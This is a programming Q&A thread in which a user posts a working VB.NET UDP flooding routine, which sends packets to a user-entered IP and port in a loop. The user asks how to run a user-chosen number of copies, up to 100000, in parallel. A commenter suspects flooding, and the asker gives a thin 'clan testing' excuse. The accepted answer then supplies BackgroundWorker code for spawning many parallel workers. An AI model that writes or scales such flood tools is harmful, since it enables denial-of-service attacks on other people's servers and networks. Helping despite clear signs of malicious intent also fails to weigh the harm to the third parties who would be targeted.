# VB.NET - Running one sub multiple times at once

Tags: vb.net, multithreading

I have one Private sub that runs in a loop. I want the sub to run multiple times at once. For example the program runs, you press start; you run the program again and press start, again and again... the same program doing the job at once. now i just want one program do to it alone. But i would like it to be user defined. exp. run program. type in a text box 10. press start. and it works as if 10 of them work open working on the same thing.

I have seen another program made with vb.net 2010 and its what i use and do not know how to do it. so i am just wondering.

```
Private Sub Flood1(ByVal sender As Object, ByVal e As DoWorkEventArgs) Handles Flood.DoWork
    Dim IP As IPAddress = IPAddress.Parse(TextBox1.Text)
    Dim IPPort As New IPEndPoint(IP, Convert.ToInt32(TextBox2.Text))
    Dim PacketS As Byte() = New Byte(TextBox3.Text) {}
    Dim SocketN As Integer = Convert.ToInt32(TextBox4.Text)
    Do While Flooding = True
        For i = 0 To SocketN
            If Flooding = True Then
                Dim _Sock(i) As Socket
                _Sock(i) = New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
                Try
                    _Sock(i).SendTo(PacketS, IPPort)
                    Threading.Thread.Sleep(500)
                Catch ex As Exception
                    Threading.Thread.Sleep(500)
                End Try
            Else
                Exit Do
            End If
        Next
    Loop
End Sub
```

Mostly want to have this work over and over at once by the users choice... kinda hoped not to use this code else might not get helped.

Comment: Hi SirAudens, welcome to Stack Overflow! I'm not sure I really understand your question - what is the type of work your "private sub" is doing and what aspect do you have questions about? Are you asking about how to creat a multithreaded application (the same sub executing several times in parallel on different cores/processors)? Or do you just want the computer to call the sub 10 times so that it executes one after the other without you having to click? If you could provide a short code sample of what you try, this would help...

Comment: Trying to learn how to post the code

Comment: hmmm a method called Flood(). Are you really trying to flood an IP address?

Comment: *kinda hoped not to use this code else might not get helped* for learning perposes and im part of a gaming clan were we keep testing random things on each others networks and servers for fun (us nerds attack each other with new stuff on our day off to build server defenses. surpised how many ppl accually attack ts3 servers bcuz they want to when a tf2 battle) and i want to start being one of those nerds so im trying to learn basic stuff. and i just want to know this becuz i want to know. i could run it 20 times and use it. but using it isnt wat i do with it. i just want to make a completed one

Answer (score 1, accepted):

You can use background worker for that.
Once you know how many workers you want to do the job
just create those many instances of background worker.
Tell me if this is the answer you are looking for or not

Sample Source Code

```
Imports System.ComponentModel

Module Module1

    Sub Main()
        Console.WriteLine("Please enter the worker count:")
        Dim workerCount As Integer = Console.ReadLine()
        For i As Int16 = 0 To workerCount
            Dim worker As BackgroundWorker = New BackgroundWorker
            worker.RunWorkerAsync(i + 1)
            AddHandler worker.DoWork, AddressOf Worker_DoWork
        Next
    End Sub

    Private Sub Worker_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs)
        Console.WriteLine(e.Argument.ToString())
    End Sub
End Module
```

Comment: Sadly no. i wish to find out how who ever uses the program can chose how many they want 1 to like 100000 depending on how they use it

Comment: The example you gave, itself is already using a background worker. You can see that it handles the DoWork event of the worker.

Comment: yes. i know its using a background worker... but i want to run more of them but not a set number. a user defined number of them. like b4 they run it. they type 15 in a textbox and it acts like its running 15 background workers

Comment: You can run as many instances of workers as you want if you run a loop and create those instances in it.

Comment: oh idk how to do that. can you please explain?

Comment: I have added the source. You can compile this as console application. Run it on command prompt.

Comment: Thank you Subhash i will try and see if im not brain dead enoughf to figure out a module

Comment: the code looks right for wat im looking for even though i dont know how to apply it but if i give it enoughf time staring at it i should figure it out... so yes. all mark it as helpfull or what ever it is. thanks again!

Comment: and just to save me time.. how do i use this code into my original.. like do i use a code to use the module or was it a example for me to apply in my code

Comment: It is an example. The code I provided is of a console application. You, I think are working on 'windows forms application'. So you have to take this code as an example and apply it to your 'windows forms application' code.

Comment: ok thats what i thought. i think im getting it thanks again. this will be my last comment... im probly just looking more stupid the more i talk.. unless someone else wants me to ask something